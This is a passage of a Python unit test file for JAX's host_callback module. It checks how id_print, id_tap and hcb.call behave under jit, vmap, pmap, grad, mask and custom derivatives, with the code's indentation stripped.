"""Vmap of while, with a tap in the conditional."""
def func(x):
# like max(x, 2)
x1 = hcb.id_print(x, where="1", output_stream=testing_stream)
x2 = lax.while_loop(lambda x: hcb.id_print(x < 2, where="w_c",
output_stream=testing_stream),
lambda x: hcb.id_print(x + 1, where="w_b",
output_stream=testing_stream),
x1)
res = hcb.id_print(x2, where="3", output_stream=testing_stream)
return res
inputs = np.arange(5, dtype=np.int32)
res = api.jit(api.vmap(func))(inputs)
hcb.barrier_wait()
self.assertAllClose(np.array([2, 2, 2, 3, 4]), res, check_dtypes=False)
assertMultiLineStrippedEqual(self, """
transforms: [('batch', {'batch_dims': (0,)})] where: 1
[0 1 2 3 4]
transforms: [('batch', {'batch_dims': (0,)})] where: w_c
[ True True False False False]
transforms: [('batch', {'batch_dims': (0,)})] where: w_b
[1 2 3 4 5]
transforms: [('batch', {'batch_dims': (0,)})] where: w_c
[ True False False False False]
transforms: [('batch', {'batch_dims': (0,)})] where: w_b
[2 3 3 4 5]
transforms: [('batch', {'batch_dims': (0,)})] where: w_c
[False False False False False]
transforms: [('batch', {'batch_dims': (0,)})] where: 3
[2 2 2 3 4]""", testing_stream.output)
testing_stream.reset()
def test_tap_transforms(self):
def power(x, n):
x, n = hcb.id_print((x, n), output_stream=testing_stream)
return x * x * n * x
def f(x, n):
return x * power(x + 1., n)
x = 3.
print("impl = ", f(x, 2.))
hcb.barrier_wait()
expected = """
( 4.
2. )"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
testing_stream.reset()
print("jvp = ", api.jvp(lambda x: f(x, 2.), (x,), (1.,)))
hcb.barrier_wait()
expected = """
transforms: ['jvp']
( ( 4.
2. )
( 1.
0. ) )"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
testing_stream.reset()
print("grad = ", api.grad(f)(x, 2.))
hcb.barrier_wait()
expected = """
( 4.
2. )
transforms: ['jvp', 'transpose']
( 288.
192. )"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
testing_stream.reset()
xv = np.array([3., 4.])
print("vmap o grad = ", api.vmap(api.grad(f))(xv, np.array([2., 3.])))
hcb.barrier_wait()
expected = """
transforms: [('batch', {'batch_dims': (0, 0)})]
( [4. 5.]
[2. 3.] )
transforms: ['jvp', 'transpose', ('batch', {'batch_dims': (0, 0)})]
( [288. 900.]
[192. 500.] )"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
testing_stream.reset()
def test_tap_pmap(self):
xv = jnp.arange(len(devices()), dtype=jnp.int32)
def fun1(x, do_print=False): # x: i32
return maybe_print(do_print, x * 2, "x * 2", tap_with_device=True)
pmap_fun1 = api.pmap(partial(fun1, do_print=True), devices=devices())
res = pmap_fun1(xv)
hcb.barrier_wait()
expected_res = api.pmap(partial(fun1, do_print=False),
devices=devices())(xv)
self.assertAllClose(expected_res, res, check_dtypes=False)
# Assertion text is for 2 devices (also works for 1 device)
assertMultiDeviceOutputEqual(self, """
device: cpu:0 what: x * 2
0
device: cpu:1 what: x * 2
2""")
testing_stream.reset()
def test_tap_pmap_vmap(self):
# A matrix M[ij] = i * 10 + j
nr_devices = len(devices())
shape = (nr_devices, 3)
matrix = np.fromfunction(lambda i, j: 10. * i + j, shape,
dtype=np.int32)
def fun1(x, do_print=False): # x: i32
return maybe_print(do_print, x * 2, "x * 2", tap_with_device=True)
pmap_vmap_fun1 = api.pmap(api.vmap(partial(fun1, do_print=True)),
devices=devices())
res = pmap_vmap_fun1(matrix)
hcb.barrier_wait()
expected_res = api.pmap(api.vmap(partial(fun1, do_print=False)),
devices=devices())(matrix)
self.assertAllClose(expected_res, res, check_dtypes=False)
# Assertion text is for 2 devices (also works for 1 device)
assertMultiDeviceOutputEqual(self, """
device: cpu:0 transforms: [('batch', {'batch_dims': (0,)})] what: x * 2
[0.00 2.00 4.00]
device: cpu:1 transforms: [('batch', {'batch_dims': (0,)})] what: x * 2
[20.00 22.00 24.00]""")
testing_stream.reset()
def test_tap_pmap_pmap_vmap(self):
# A matrix M[ijk] = i * 100 + j * 10 + k
nr_devices = len(devices())
if nr_devices % 2 != 0:
raise SkipTest("test works only on even number of devices")
shape = (2, nr_devices // 2, 3)
matrix = np.fromfunction(lambda i, j, k: 100. * i + 10. * j + k, shape,
dtype=np.float32)
def fun1(x, do_print=False): # x: f32
y = maybe_print(do_print, x * 2., "x * 2", tap_with_device=True)
return y ** 2
pmap_fun1 = api.pmap(api.pmap(api.vmap(partial(fun1, do_print=True))),
devices=devices())
res = pmap_fun1(matrix)
hcb.barrier_wait()
expected_res = api.pmap(api.pmap(api.vmap(partial(fun1, do_print=False))),
devices=devices())(matrix)
self.assertAllClose(expected_res, res, check_dtypes=False)
# Assertion text is for 2 devices (also works for 1 device)
assertMultiDeviceOutputEqual(self, """
device: cpu:0 transforms: [('batch', {'batch_dims': (0,)})] what: x * 2
[0.00 2.00 4.00]
device: cpu:1 transforms: [('batch', {'batch_dims': (0,)})] what: x * 2
[200.00 202.00 204.00]""")
testing_stream.reset()
@ignore_jit_of_pmap_warning()
def test_tap_pmap_pmap_extra(self):
"""pmap of a pmap surrounded by extra code."""
# A matrix M[ij] = i * 10 + j
nr_devices = len(devices())
if nr_devices != 2:
raise SkipTest("test works only on 2 devices")
shape = (2, 1, 3)
matrix = np.fromfunction(lambda i, j, k: 100. * i + 10. * j + k, shape,
dtype=np.float32)
def fun(xv, do_print=False):
# This will be printed on all devices, with shape [1, 3]
xv = maybe_print(do_print, xv + 1., "before", tap_with_device=True)
res = api.pmap(lambda x: maybe_print(do_print, x * 2., "inside", tap_with_device=True))(xv)
# This will be printed on all devices, with shape [1, 3]
return maybe_print(do_print, res + 1., "after", tap_with_device=True)
res = api.pmap(partial(fun, do_print=True))(matrix)
self.assertAllClose(fun(matrix, do_print=False), res, check_dtypes=False)
hcb.barrier_wait()
# Assertion text is for 2 devices (also works for 1 device)
assertMultiDeviceOutputEqual(self, """
device: cpu:0 what: before
[[1.00 2.00 3.00]]
device: cpu:0 what: inside
[2.00 4.00 6.00]
device: cpu:0 what: after
[[3.00 5.00 7.00]]
device: cpu:1 what: before
[[101.00 102.00 103.00]]
device: cpu:1 what: inside
[202.00 204.00 206.00]
device: cpu:1 what: after
[[203.00 205.00 207.00]]""")
testing_stream.reset()
def test_tap_jvp_pmap_vmap(self):
# A matrix M[ijk] = i * 100 + j * 10 * k
nr_devices = len(devices())
shape = (nr_devices, 2, 3)
matrix = np.fromfunction(lambda i, j, k: 100. * i + 10. * j + k, shape,
dtype=np.float32)
def fun(xv, do_print=False):
# x: f32[3]
return api.jvp(api.pmap(api.vmap(lambda x: maybe_print(do_print, x * 2., "x * 2", tap_with_device=True))),
(xv,), (.1 * jnp.ones_like(xv),))
res = fun(matrix, do_print=True)
hcb.barrier_wait()
expected_res = fun(matrix, do_print=False)
self.assertAllClose(expected_res, res, check_dtypes=False)
# Assertion text is for 2 devices (also works for 1 device)
# Device 0 will get to execute api.jvp(api.vmap(...)) for matrix[0, :, :]
assertMultiDeviceOutputEqual(self, """
device: cpu:0 transforms: [('batch', {'batch_dims': (0,)}), 'jvp'] what: x * 2
( [[ 0.00 2.00 4.00]
[20.00 22.00 24.00]]
[[0.20 0.20 0.20]
[0.20 0.20 0.20]] )
device: cpu:1 transforms: [('batch', {'batch_dims': (0,)}), 'jvp'] what: x * 2
( [[200.00 202.00 204.00]
[220.00 222.00 224.00]]
[[0.20 0.20 0.20]
[0.20 0.20 0.20]] )""")
testing_stream.reset()
def test_tap_vmap_pmap(self):
# A matrix M[ijk] = i * 100 + j * 10 * k
nr_devices = len(devices())
shape = (2, nr_devices, 3)
matrix = np.fromfunction(lambda i, j, k: 100. * i + 10. * j + k, shape,
dtype=np.float32)
def fun(xv, do_print=False):
# x: f32[3]
return api.vmap(api.pmap(lambda x: maybe_print(do_print, x * 2., "x * 2", tap_with_device=True)))(xv)
res = fun(matrix, do_print=True)
hcb.barrier_wait()
expected_res = fun(matrix, do_print=False)
self.assertAllClose(expected_res, res, check_dtypes=False)
# Assertion text is for 2 devices (also works for 1 device)
# Device 0 will get to execute api.jvp(api.vmap(...)) for matrix[:, 0, :]
assertMultiDeviceOutputEqual(self, """
device: cpu:0 transforms: [('batch', {'batch_dims': (0,)})] what: x * 2
[[ 0.00 2.00 4.00]
[200.00 202.00 204.00]]
device: cpu:1 transforms: [('batch', {'batch_dims': (0,)})] what: x * 2
[[ 20.00 22.00 24.00]
[220.00 222.00 224.00]]""")
testing_stream.reset()
@ignore_jit_of_pmap_warning()
def test_tap_jit_pmap_extra(self):
"""jit of a pmap surrounded by extra code."""
# A matrix M[ij] = i * 10 + j
nr_devices = len(devices())
assert nr_devices in (1, 2)
shape = (nr_devices, 3)
matrix = np.fromfunction(lambda i, j: 10. * i + j, shape,
dtype=np.float32)
def fun(xv, do_print=False):
# This will be printed on all devices with shape (nr_devices, 3)
xv = maybe_print(do_print, xv + 1., "before", tap_with_device=True)
res = api.pmap(lambda x: maybe_print(do_print, x * 2., "inside", tap_with_device=True))(xv)
# This will be printed on all devices with shape (nr_devices, 3)
return maybe_print(do_print, res + 1., "after", tap_with_device=True)
res = api.jit(partial(fun, do_print=True))(matrix)
self.assertAllClose(fun(matrix, do_print=False), res, check_dtypes=False)
hcb.barrier_wait()
if len(devices()) == 2:
assertMultiDeviceOutputEqual(self, """
device: cpu:0 what: before
[[ 1.00 2.00 3.00]
[11.00 12.00 13.00]]
device: cpu:0 what: inside
[2.00 4.00 6.00]
device: cpu:0 what: after
[[ 3.00 5.00 7.00]
[23.00 25.00 27.00]]
device: cpu:1 what: before
[[ 1.00 2.00 3.00]
[11.00 12.00 13.00]]
device: cpu:1 what: inside
[22.00 24.00 26.00]
device: cpu:1 what: after
[[ 3.00 5.00 7.00]
[23.00 25.00 27.00]]""")
else:
assert len(devices()) == 1
assertMultiDeviceOutputEqual(self, """
device: cpu:0 what: before
[[1.00 2.00 3.00]]
device: cpu:0 what: inside
[2.00 4.00 6.00]
device: cpu:0 what: after
[[3.00 5.00 7.00]]""")
testing_stream.reset()
def test_tap_cond_pmap(self):
raise SkipTest("cond of pmap does not work in JAX. Issue #5178.")
# A matrix M[ij] = i * 10 + j
nr_devices = len(devices())
shape = (nr_devices, 3)
matrix = np.fromfunction(lambda i, j: 10. * i + j, shape,
dtype=np.float32)
def fun1(x, do_print=False):
return maybe_print(do_print, x * 2., "x * 2")
def fun2(cond, xv, do_print=False):
return lax.cond(cond, api.pmap(partial(fun1, do_print=do_print)),
lambda xv: xv, xv)
res = fun2(True, matrix)
self.assertAllClose(fun2(True, matrix, do_print=False), res, check_dtypes=False)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
TBD""", testing_stream.output)
testing_stream.reset()
def test_tap_tap_scan_custom_jvp(self):
"""custom JVP, inside scan.
This exercises the custom_jvp_call_jaxpr primitives."""
@api.custom_jvp
def f(x):
return x * hcb.id_print(x, output_stream=testing_stream, what="x")
@f.defjvp
def f_jvp(primals, tangents):
x, = primals
x_dot, = tangents
primal_out = f(x)
tangent_out = 3. * x * hcb.id_print(x_dot, output_stream=testing_stream, what="x_dot")
return primal_out, tangent_out
def g(x):
# Sum f(x_i)
return lax.scan(lambda carry, inp: (carry + f(inp), 0.),
np.full(x.shape[1:], 0.), # Like x w/o leading dim
x)[0]
arg = np.full((2,), 0.7)
self.assertAllClose(0.7 * 0.7 * 2, g(arg))
hcb.barrier_wait()
self.assertMultiLineStrippedEqual("""
what: x
0.7
what: x
0.7""", testing_stream.output)
testing_stream.reset()
self.assertAllClose(np.array([2.1, 2.1]), api.grad(g)(arg), check_dtypes=False)
hcb.barrier_wait()
self.assertMultiLineStrippedEqual("""
what: x
0.7
what: x
0.7
transforms: ['transpose'] what: x_dot
2.1
transforms: ['transpose'] what: x_dot
2.1""", testing_stream.output)
def test_tap_scan_custom_vjp(self):
"""custom VJP, inside scan.
This exercises the custom_vjp_call_jaxpr primitives."""
@api.custom_vjp
def f(x):
return x * hcb.id_print(x, output_stream=testing_stream, what="x")
# f_fwd: a -> (b, residual)
def f_fwd(x):
return f(x), 3. * x
# f_bwd: (residual, CT b) -> [CT a]
def f_bwd(residual, ct_b):
return residual * hcb.id_print(ct_b, output_stream=testing_stream, what="ct_b"),
f.defvjp(f_fwd, f_bwd)
def g(x):
# Sum f(x_i)
return lax.scan(lambda carry, inp: (carry + f(inp), 0.),
np.full(x.shape[1:], 0.), # Like x w/o leading dim
x)[0]
arg = np.full((2,), 0.7)
self.assertAllClose(0.7 * 0.7 * 2, g(arg))
hcb.barrier_wait()
self.assertMultiLineStrippedEqual("""
what: x
0.7
what: x
0.7""", testing_stream.output)
testing_stream.reset()
self.assertAllClose(np.array([2.1, 2.1]), api.grad(g)(arg), check_dtypes=False)
hcb.barrier_wait()
self.assertMultiLineStrippedEqual("""
what: x
0.7
what: x
0.7
what: ct_b
1.
what: ct_b
1.""", testing_stream.output)
def test_tap_mask(self):
@partial(api.mask, in_shapes=['n'], out_shape='')
def padded_sum(x):
three_x = hcb.id_print((x, 2 * x), result=3 * x, what="x",
output_stream=testing_stream)
return jnp.sum(three_x)
x = np.arange(5.)
self.assertAllClose(9., padded_sum([x], dict(n=3)))
hcb.barrier_wait()
self.assertMultiLineStrippedEqual("""
transforms: [('mask', {'logical_shapes': 5})] what: x
( ( [0. 1. 2. 3. 4.]
[0. 2. 4. 6. 8.] )
( ( 3 )
( 3 ) ) )""", testing_stream.output)
testing_stream.reset()
# With VMAP
xv = np.arange(10.).reshape((2, 5)) # logical_shape = 5
self.assertAllClose(
np.array([9., 78.]),
# batch_size = 2, n=3 and 4 for the two elements
api.vmap(padded_sum)([xv],
dict(n=np.array([3., 4.]))))
hcb.barrier_wait()
self.assertMultiLineStrippedEqual("""
transforms: [('mask', {'logical_shapes': 5}), ('batch', {'batch_dims': (0, 0, 0, 0)})] what: x
( ( [[0. 1. 2. 3. 4.]
[5. 6. 7. 8. 9.]]
[[ 0. 2. 4. 6. 8.]
[10. 12. 14. 16. 18.]] )
( ( [3. 4.] )
( [3. 4.] ) ) )""", testing_stream.output)
testing_stream.reset()
# With JVP
self.assertAllClose((9., 0.9),
api.jvp(lambda arg: padded_sum([arg], dict(n=3)),
(x,), (x * 0.1,)))
hcb.barrier_wait()
self.assertMultiLineStrippedEqual("""
transforms: [('mask', {'logical_shapes': 5}), 'jvp'] what: x
( ( ( [0. 1. 2. 3. 4.]
[0. 2. 4. 6. 8.] )
( ( 3 )
( 3 ) ) )
( ( [0. 0.1 0.2 0.3 0.4]
[0. 0.2 0.4 0.6 0.8] )
( ( False )
( False ) ) ) )""", testing_stream.output)
testing_stream.reset()
# Now with JIT
self.assertAllClose(9., api.jit(padded_sum)([x], dict(n=3)))
hcb.barrier_wait()
self.assertMultiLineStrippedEqual("""
transforms: [('mask', {'logical_shapes': 5})] what: x
( ( [0. 1. 2. 3. 4.]
[0. 2. 4. 6. 8.] )
( ( 3 )
( 3 ) ) )""", testing_stream.output)
testing_stream.reset()
def test_tap_callback_delay(self):
hcb.callback_extra = lambda dev: time.sleep(1)
def func(x):
for i in range(5):
x = hcb.id_print(x * i, what="x times i")
return x
api.jit(func)(np.arange(6, dtype=np.float32).reshape((2, 3)))
def test_tap_callback_delay_barrier(self):
hcb.callback_extra = lambda dev: time.sleep(2)
def func(x):
for i in range(1, 4):
x = hcb.id_print(x * i, what="x times i", output_stream=testing_stream)
return x
api.jit(func)(np.arange(6, dtype=np.float32).reshape((2, 3)))
# Wait for the results
hcb.barrier_wait()
expected = """
what: x times i
[[0. 1. 2.]
[3. 4. 5.]]
what: x times i
[[ 0. 2. 4.]
[ 6. 8. 10.]]
what: x times i
[[ 0. 6. 12.]
[18. 24. 30.]]"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
testing_stream.reset()
# Call again
api.jit(func)(np.arange(6, dtype=np.float32).reshape((2, 3)))
hcb.barrier_wait()
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
def test_tap_error_bad_consumer_id(self):
"""Try to use reserved consumer ID 0.
Check that we get the proper error from the runtime."""
comp = xla_bridge.make_computation_builder(self._testMethodName)
token = hcb.xops.CreateToken(comp)
hcb._initialize_outfeed_receiver() # Needed if this is the sole test
with self.assertRaisesRegex(RuntimeError,
"Consumer ID cannot be a reserved value: 0"):
hcb._outfeed_receiver.receiver.add_outfeed(
comp, token, 0,
[xla_bridge.constant(comp, np.zeros((2, 3), dtype=np.float32))])
def test_tap_error_different_shapes(self):
"""Try to register different shapes for the same consumer ID."""
comp = xla_bridge.make_computation_builder(self._testMethodName)
token = hcb.xops.CreateToken(comp)
hcb._initialize_outfeed_receiver() # Needed if this is the sole test
hcb._outfeed_receiver.receiver.add_outfeed(
comp, token, 123,
[xla_bridge.constant(comp, np.zeros((2, 3), dtype=np.float32))])
with self.assertRaisesRegex(
RuntimeError, ".*does not match previous shape element_type.*"):
hcb._outfeed_receiver.receiver.add_outfeed(
comp, token, 123,
[xla_bridge.constant(comp, np.zeros((2, 3), dtype=np.int32))])
with self.assertRaisesRegex(
RuntimeError, ".*does not match previous shape element_type.*"):
hcb._outfeed_receiver.receiver.add_outfeed(
comp, token, 123,
[xla_bridge.constant(comp, np.zeros((2,), dtype=np.float32))])
def test_tap_id_tap_removed_kwargs(self):
def func(x, transforms, y):
pass
with self.assertRaisesRegex(TypeError, r"Support for \*\*kwargs in ``id_tap``"):
hcb.id_tap(func, 1, y=2)
def test_tap_odeint(self):
# TODO: find a smaller repro for bug #4015
# Seems to be xla_call(scan(xla_call)), all under grad.
from jax.experimental.ode import odeint
def f(x, t, k):
x = hcb.id_print(x)
return -k * x
def loss(k=1.0):
t = jnp.linspace(0, 0.001, num=2)
xs = odeint(f, 1.0, t, k)
return xs[-1]
api.grad(loss)(1.0) # should not fail
def test_tap_remat(self):
def f(i, k):
x = hcb.id_print(k + i, output_stream=testing_stream)
return k * x
def loss(k):
return lax.fori_loop(0, 2, api.remat(f), k)
print(loss(3))
hcb.barrier_wait()
expected = """
3
10"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
def test_tap_named_call(self):
def tap_scalar(init, do_print=False):
@partial(api.named_call, name="step")
def step(acc, step_nr):
acc = acc + step_nr
maybe_print(do_print, step_nr, what="step_nr")
return acc, None
return lax.scan(step, init, np.arange(2))
self.assertAllClose(tap_scalar(3., do_print=False), tap_scalar(3., do_print=True))
hcb.barrier_wait()
expected = """
what: step_nr
0
what: step_nr
1"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
class HostCallbackCallTest(jtu.JaxTestCase):
"""Tests for hcb.call"""
def setUp(self):
if jtu.device_under_test() == "gpu" and jax.device_count() > 1:
raise SkipTest("host_callback broken on multi-GPU platforms (#6447)")
testing_stream.reset()
testing_stream.test_method_name = self._testMethodName
super().setUp()
def tearDown(self) -> None:
hcb.barrier_wait("HostCallbackCallTest.tearDown")
super().tearDown()
def call_log_testing_stream(self, func, arg, *, result_shape, name=""):
"""Call `func` and log inputs and outputs to the testing stream"""
def call_log(arg):
def val2str(v):
return np.array2string(np.array(arg))
testing_stream.write(f"Call {name}({val2str(arg)})\n")
res = func(arg)
testing_stream.write(f" = {val2str(res)}\n")
return res
return hcb.call(call_log, arg, result_shape=result_shape)
def test_call_simple(self):
def f_outside(args):
x, y = args
return x * y
def fun(x, use_outside=True):
return 2 * (hcb.call(f_outside, (x, x + 1),
result_shape=x)
if use_outside else f_outside((x, x + 1)))
res_inside = fun(2, use_outside=False)
self.assertAllClose(res_inside, fun(2, use_outside=True))
def test_call_empty_arg(self):
"""Call with empty array."""
result = np.ones((2,), dtype=np.float32)
def f_outside(_):
return result
def fun(x):
return x + hcb.call(f_outside, (),
result_shape=api.ShapeDtypeStruct(result.shape, result.dtype))
self.assertAllClose(2. + result, fun(2.))
def test_call_empty_result(self):
"""Call returning empty array."""
result_shape = (2, 0)
def f_outside(_):
return np.ones(result_shape, dtype=np.float32)
def fun(x):
return x + hcb.call(f_outside, 1.,
result_shape=api.ShapeDtypeStruct(result_shape, np.float32))
self.assertAllClose(f_outside(0.), fun(2.))
def test_call_empty_result_inside_pytree(self):
"""Call returning a tuple with an empty array and a non-empty one."""
result_shape_0 = (2, 0)
result_shape_2 = (0,)
def f_outside(_):
return (np.ones(result_shape_0, dtype=np.float32),
np.ones((1,), dtype=np.float32),
np.ones(result_shape_2, dtype=np.float32))
def fun(x):
res = hcb.call(f_outside, 1.,
result_shape=(api.ShapeDtypeStruct(result_shape_0, np.float32),
api.ShapeDtypeStruct((1,), np.float32),
api.ShapeDtypeStruct(result_shape_2, np.float32)))
self.assertEqual(result_shape_0, res[0].shape)
self.assertEqual(result_shape_2, res[2].shape)
return x + res[1]
self.assertAllClose(2 + np.ones((1,), dtype=np.float32), fun(2.))
def test_call_empty_result_all_pytree(self):
"""Call returning a tuple of empty arrays."""
result_shape = (2, 0)
def f_outside(_):
return (np.ones(result_shape, dtype=np.float32),
np.ones(result_shape, dtype=np.float32))
def fun(x):
res = hcb.call(f_outside, 1.,
result_shape=(api.ShapeDtypeStruct(result_shape, np.float32),
api.ShapeDtypeStruct(result_shape, np.float32)))
return x + res[0] + res[1]
self.assertAllClose(np.ones(result_shape, dtype=np.float32),
fun(2.))
def test_call_no_result(self):
def f_outside(arg):
self.call_log_testing_stream(lambda x: None, arg,
result_shape=None,
name="outside")
return arg
self.assertAllClose((3., 4.), f_outside((3., 4.)))
hcb.barrier_wait()
expected = """
Call outside([3. 4.])
= [3. 4.]"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
def test_call_cond(self):
def f_outside(args):
x, y = args
return x * y
def loop(x, use_outside=True):
def body(i, acc):
return lax.cond(i % 2 == 1,
lambda _: (hcb.call(f_outside, (acc, i),
result_shape=acc)
if use_outside else f_outside((acc, i))),
lambda _: acc,
None)
return lax.fori_loop(0, 18, body, x)
res_inside = loop(1.2, use_outside=False)
self.assertAllClose(res_inside, loop(1.2, use_outside=True))
def test_call_jit_scan_call(self):
def f_outside(x):
return x
def loop(x, use_outside=True):
def body(carry, i):
if use_outside:
return carry + hcb.call(f_outside, i,
result_shape=i), None
else:
return carry + i, None
return lax.scan(body, 0, x)
x = np.arange(5, dtype=np.int32)
res_outside = api.jit(partial(loop, use_outside=True))(x)
self.assertAllClose(res_outside, loop(x, use_outside=False))
def test_call_doc_example1(self):
"""Examples from the documentation: simplest, call a function"""
def host_eig(x):
return np.linalg.eigvals(x)
shape = (2, 5, 4, 4)
m = np.ones(shape, dtype=np.float32)
def fun(m):
eig_m = hcb.call(host_eig, m,
result_shape=api.ShapeDtypeStruct(m.shape[:-1], m.dtype))
return eig_m
expected_res = np.linalg.eigvals(m)
self.assertAllClose(expected_res, fun(m))
def test_call_doc_example_hlo(self):
"""Examples from the documentation: simplest, call a function"""
def fun(m):
return jnp.sin(hcb.call(lambda x: np.cos,
jnp.cos(m),
result_shape=m))
m = np.ones((2,), np.float32)
helper_print_optimized_hlo(fun, m)
def fun(m):
x = hcb.call(lambda x: None, 2, result_shape=())
return x
m = np.ones((2,), np.float32)
helper_print_optimized_hlo(fun, m)
def test_call_with_device(self):
def callback_func(x, device=None):
testing_stream.write(f"device: {device}\n Called with {x}")
return x
def func(x):
return hcb.call(callback_func, x,
result_shape=x,
call_with_device=True)
self.assertEqual(3., func(3.))
assertMultiDeviceOutputEqual(self, """
device: cpu:0
Called with 3.00""")
testing_stream.reset()
def test_call_pmap(self):
# Works for 1 or 2 devices
def callback_func(x, device=None):
testing_stream.write(f"device: {device}\n Called with {x}")
return x * np.array(3, np.int32)
def fun(x): # x: i32
return hcb.call(callback_func, x * 2,
result_shape=x,
call_with_device=True)
xv = jnp.arange(len(devices()), dtype=jnp.int32)
res = api.pmap(fun)(xv)
self.assertAllClose(api.pmap(lambda x: x * 6)(xv), res)
# Assertion text is for 2 devices (also works for 1 device)
assertMultiDeviceOutputEqual(self, """
device: cpu:0
Called with 0
device: cpu:1
Called with 2""")
testing_stream.reset()
def test_call_vmap(self):
def f_outside(x): return x
def fun(x):
return hcb.call(f_outside, x, result_shape=x)
with self.assertRaisesRegex(NotImplementedError,
"batching rules are implemented only for id_tap, not for call"):
api.vmap(fun)(np.ones((2, 3)))
def test_call_error_bad_result_shape(self):
with self.assertRaisesRegex(
ValueError,
"The values must be either numeric scalars, or must have 'shape' and 'dtype' attributes"):
hcb.call(lambda x: x, 3., result_shape="string")
with self.assertRaisesRegex(
ValueError,
"The values must be either numeric scalars, or must have 'shape' and 'dtype' attributes"):
hcb.call(lambda x: x, 3., result_shape=lambda x: x)
hcb.barrier_wait("wait for error")
def helper_check_callback_errors(self, thunk: Callable,
expected_exc_txt: str):
"""Calls thunk() and checks for expected exceptions.
"""
if jtu.device_under_test() == "cpu":
# On CPU the runtime crashes, and the tests are all aborted
raise SkipTest("TODO: CPU runtime crashes on unexpected infeed")
elif jtu.device_under_test() == "gpu":
# On GPU we get a nice error back to Python
with self.assertRaisesRegex(
RuntimeError,
"RET_CHECK failure .* Mismatch between infeed source buffer shape s8.12345."):
thunk()
elif jtu.device_under_test() == "tpu":
# On TPU we get no error!!!
raise SkipTest("TODO: TPU runtime does not check infeed, and just computes with garbage")
# Both on GPU and TPU we also get an error during the barrier_wait at the
# end of the test. Run a barrier_wait now, to consume that error.
with self.assertRaisesRegex(
hcb.CallbackException,
re.compile(
"There were exceptions during callback processing.*Last one was:.*" +
expected_exc_txt,
re.DOTALL)):
hcb.barrier_wait("Waiting for error")
def test_call_error_callback_throws_exception(self):
def f_outside(x):
raise ValueError("user exception")
def fun(x):
return hcb.call(f_outside, x, result_shape=x)
self.helper_check_callback_errors(lambda: fun(3.),
"ValueError: user exception")
def test_call_error_callback_returns_unexpected_shape(self):
def fun(x):
return hcb.call(lambda x: (x, x), x, result_shape=x)
self.helper_check_callback_errors(lambda: fun(3.),
"Callback func .* should have returned a result with pytree")
def test_call_error_then_compute(self):
# Continue computation on device after error
def f_outside(x):
raise ValueError("user exception")
def fun(x):
x1 = hcb.call(f_outside, x, result_shape=x)
return x1
arg = np.arange(3, dtype=np.int32)
self.helper_check_callback_errors(lambda: self.assertAllClose(arg, fun(arg)),
"ValueError: user exception")
def call_jax_other_device(jax_outside_fun, arg, *, device):
"""Calls a JAX function on a specific device with simple support for reverse AD.
Functions whose name starts with "jax_outside" are called on another device,
by way of hcb.call.
"""
def run_jax_outside_fun(arg):
return api.jit(jax_outside_fun)(api.device_put(arg, device))
@api.custom_vjp
def make_call(arg):
return hcb.call(run_jax_outside_fun, arg,
result_shape=api.eval_shape(jax_outside_fun, arg))
# Define the fwd and bwd custom_vjp functions
def make_call_vjp_fwd(arg):
# Return the primal argument as the residual. Use `make_call` for the
# primal computation to enable higher-order AD.
return make_call(arg), arg # Return the primal argument as the residual
def make_call_vjp_bwd(res, ct_res):
arg = res # residual is the primal argument
def jax_outside_vjp_fun(arg_and_ct):
arg, ct = arg_and_ct
_, f_vjp = api.vjp(jax_outside_fun, arg)
ct_in, = f_vjp(ct)
return ct_in
return (call_jax_other_device(jax_outside_vjp_fun, (arg, ct_res), device=device),)
make_call.defvjp(make_call_vjp_fwd, make_call_vjp_bwd)
return make_call(arg)
class CallJaxTest(jtu.JaxTestCase):
"""Tests using `call_jax_other_device`."""
def setUp(self):
if jtu.device_under_test() == "gpu" and jax.device_count() > 1:
raise SkipTest("host_callback broken on multi-GPU platforms (#6447)")
if jtu.device_under_test() != "cpu":
assert api.devices("cpu")
self.outside_device = api.devices("cpu")[0]
else:
if len(api.devices("cpu")) == 1:
raise SkipTest("Test needs at least two devices. On CPU use XLA_FLAGS=--xla_force_host_platform_device_count=2")
self.outside_device = api.devices("cpu")[1]
super().setUp()
def test_jax_impl(self):
def f_jax(x):
return jnp.sin(x)
def f_outside(x):
return call_jax_other_device(f_jax, x, device=self.outside_device)
self.assertAllClose(f_jax(3.), f_outside(3.))
self.assertAllClose(f_jax(3.), api.jit(f_outside)(3.))
def test_jax_impl_pytree(self):
def f_jax(x):
# x : dict(a=..., b=...) and output is a list of two elements
return [jnp.sin(x["a"]), jnp.sin(x["b"])]
def f_outside(x):
return call_jax_other_device(f_jax, x, device=self.outside_device)
x = dict(a=3., b=4.)
res_jax = f_jax(x)
# print(f"outside_jaxpr = {api.make_jaxpr(f_outside)(x)}")
res_outside = f_outside(x)
self.assertAllClose(res_jax, res_outside)
def test_jax_grad(self):
def f_jax(x):
return 2. * jnp.sin(x)
def f_outside(x):
return 2. * call_jax_other_device(jnp.sin, x, device=self.outside_device)
res_jax = api.grad(f_jax)(3.)
self.assertAllClose(res_jax, api.grad(f_outside)(3.))
def test_jax_grad_pytree(self):
def f_jax(x):
# x : dict(a=..., b=...) and output is a float
return 3. * jnp.sin(x["a"]) + jnp.sin(x["b"])
def f_outside(x):
return call_jax_other_device(f_jax, x, device=self.outside_device)
x = dict(a=3., b=4.)
res_jax = api.grad(f_jax)(x)
self.assertAllClose(res_jax, api.grad(f_outside)(x))
def test_jax_grad_of_grad(self):
def f_jax(x):
return 2. * x * x * x
def f_outside(x):
return 2. * call_jax_other_device(lambda x: x * x * x, x, device=self.outside_device)
res_jax = api.grad(api.grad(f_jax))(5.)
res_outside = api.grad(api.grad(f_outside))(5.)
self.assertAllClose(res_jax, res_outside)
class OutfeedRewriterTest(jtu.JaxTestCase):
def setUp(self):
if jtu.device_under_test() == "gpu" and jax.device_count() > 1:
raise SkipTest("host_callback broken on multi-GPU platforms (#6447)")
super().setUp()
def assertRewrite(self, expected: str, func: Callable, args: Sequence,
has_input_token=True, has_output_token=True):
"""Check that the rewrite of func(*args) matches expected."""
jaxpr = api.make_jaxpr(func)(*args)
rewritten = hcb._rewrite_closed_jaxpr(jaxpr, # noqa: F841
has_input_token, has_output_token)
